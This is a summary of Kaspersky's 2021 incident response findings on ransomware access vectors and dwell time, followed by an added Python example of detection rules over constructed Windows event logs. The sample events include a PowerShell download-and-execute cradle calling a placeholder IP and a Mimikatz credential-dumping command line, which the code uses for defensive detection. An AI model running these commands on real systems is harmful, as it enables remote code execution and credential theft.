The Incident Response Analyst Report provides insights into the incident investigation services conducted by Kaspersky in 2021. We deliver a range of services to help organizations when they are in need: incident response, digital forensics and malware analysis. The data in this report comes from our daily practice with organizations seeking assistance, either with full-blown incident response or with complementary expert activities supporting their internal incident response teams.
In 2021, although the main threat trends remained the same, our service approach moved to near-complete remote delivery: 98% of all cases were handled remotely. Kaspersky Digital Forensics and Incident Response operations are handled by our Global Emergency Response Team (GERT), with experts in Europe, Asia, South and North America, the Middle East and Africa.
The research data shows that attacks involving ransomware used the same basic initial access vectors as other types of attack. Exploitation of vulnerabilities and previously compromised user accounts accounted for 37.5% of cases, while malicious email was the entry point in one in four cases involving cryptors.
However, in a number of attacks the adversary's goal was not extortion through data encryption but the data itself: company data, personal data, intellectual property and other sensitive information.
The damage from this kind of attack is almost impossible to contain. It leads to reputational loss as well as potential penalties from regulators and lawsuits, and attackers use all of this as additional leverage for blackmail.
We observed data leakage in 10% of cases involving cryptors. In addition, cryptors are sometimes deployed to destroy the initial traces of an attack and to complicate the incident investigation.
Analysis of the duration of cryptor attacks shows that a significant period of time passes between the initial compromise of the network and the final stage of the attack: in 62.5% of attacks, the adversary spent more than a month inside the network before encrypting data. A properly organized detection and response process shortens the time it takes to detect attackers in the network and prevents the final damage.
After initial penetration, attackers use PowerShell to collect data, Mimikatz to escalate privileges by harvesting credentials, PsExec to execute commands remotely, or frameworks like Cobalt Strike for all stages of the attack.
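The tooling named above leaves characteristic traces in standard Windows telemetry, which is what makes the dwell time of a month or more detectable in practice. The following is an added example, not code from the Kaspersky report: a small set of detection rules run over constructed Sysmon, System and PowerShell event records. Field names follow the Sysmon schema (Image, OriginalFileName, CommandLine, PipeName), the System log for event 7045 (ServiceName, ImagePath) and PowerShell script block logging for event 4104 (ScriptBlockText); the sample events, the event ids and the IP address are made up. The Cobalt Strike rule matches the tool's default named pipe patterns, which operators can change in a malleable C2 profile, so it is assumed here to catch only unmodified deployments.

```python
"""Detection rules for PowerShell, Mimikatz, PsExec and Cobalt Strike traces,
run over constructed Windows event records. Added illustration, not part of
the Kaspersky report."""
import re

# --- Constructed sample telemetry (not real incident data) -----------------
EVENTS = [
    # Sysmon EID 1, process creation. The binary was renamed, but the PE
    # OriginalFileName field still says mimikatz.exe, and the command line
    # carries Mimikatz module syntax ("module::command").
    {"id": 1, "EventID": 1,
     "Image": r"C:\Users\j.doe\AppData\Local\Temp\svc.exe",
     "OriginalFileName": "mimikatz.exe",
     "CommandLine": "svc.exe privilege::debug sekurlsa::logonpasswords exit"},
    # Sysmon EID 1, legitimate system activity that must not fire.
    {"id": 2, "EventID": 1,
     "Image": r"C:\Windows\System32\svchost.exe",
     "OriginalFileName": "svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    # System EID 7045: PsExec installs its service on the remote target.
    {"id": 3, "EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    # PowerShell EID 4104: script block that downloads and runs code in memory.
    {"id": 4, "EventID": 4104,
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"},
    # Sysmon EID 17, pipe created with a Cobalt Strike default pipe name.
    {"id": 5, "EventID": 17, "PipeName": r"\postex_4a2c"},
    # Sysmon EID 17, benign pipe.
    {"id": 6, "EventID": 17, "PipeName": r"\lsass"},
]

# Mimikatz module prefixes as they appear on the command line.
MIMIKATZ_MODULES = re.compile(r"\b(sekurlsa|lsadump|privilege|kerberos|token)::", re.I)
# Default pipe names (assumption: unmodified malleable C2 profile).
CS_PIPES = re.compile(r"^\\(msagent_[0-9a-f]+|MSSE-\d+-server|postex_[0-9a-f]+)$", re.I)
# Common download-and-execute cradle markers in script blocks.
PS_SUSPICIOUS = re.compile(
    r"(-enc(odedcommand)?\b|\bIEX\b|Invoke-Expression|DownloadString|FromBase64String)", re.I)


def rule_mimikatz(e):
    """Sysmon EID 1 with Mimikatz's original file name or module syntax."""
    if e.get("EventID") != 1:
        return False
    return (e.get("OriginalFileName", "").lower() == "mimikatz.exe"
            or MIMIKATZ_MODULES.search(e.get("CommandLine", "")) is not None)


def rule_psexec(e):
    """PSEXESVC service installation (EID 7045) or its process start (EID 1)."""
    if e.get("EventID") == 7045:
        return "psexesvc" in (e.get("ServiceName", "") + e.get("ImagePath", "")).lower()
    if e.get("EventID") == 1:
        return (e.get("Image", "").lower().endswith("psexesvc.exe")
                or e.get("OriginalFileName", "").lower() == "psexesvc.exe")
    return False


def rule_powershell(e):
    """PowerShell EID 4104 script block with download/encoded-command markers."""
    return e.get("EventID") == 4104 and PS_SUSPICIOUS.search(e.get("ScriptBlockText", "")) is not None


def rule_cobalt_pipe(e):
    """Sysmon EID 17 pipe creation matching a Cobalt Strike default pipe name."""
    return e.get("EventID") == 17 and CS_PIPES.match(e.get("PipeName", "")) is not None


RULES = {
    "mimikatz_credential_dump": rule_mimikatz,
    "psexec_service_install": rule_psexec,
    "powershell_download_cradle": rule_powershell,
    "cobaltstrike_default_pipe": rule_cobalt_pipe,
}


def detect(events):
    """Return [(rule_name, event_id), ...] for every rule that fires, in event order."""
    hits = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.append((name, e["id"]))
    return hits


if __name__ == "__main__":
    for name, eid in detect(EVENTS):
        print(f"{name}: event {eid}")
```

The OriginalFileName check in the Mimikatz rule is the part worth copying: renaming the executable defeats an Image-path match but not the PE header field that Sysmon records. Conversely, the pipe rule only catches attackers who kept the framework's defaults, which is why it is paired with the behavioural rules rather than relied on alone.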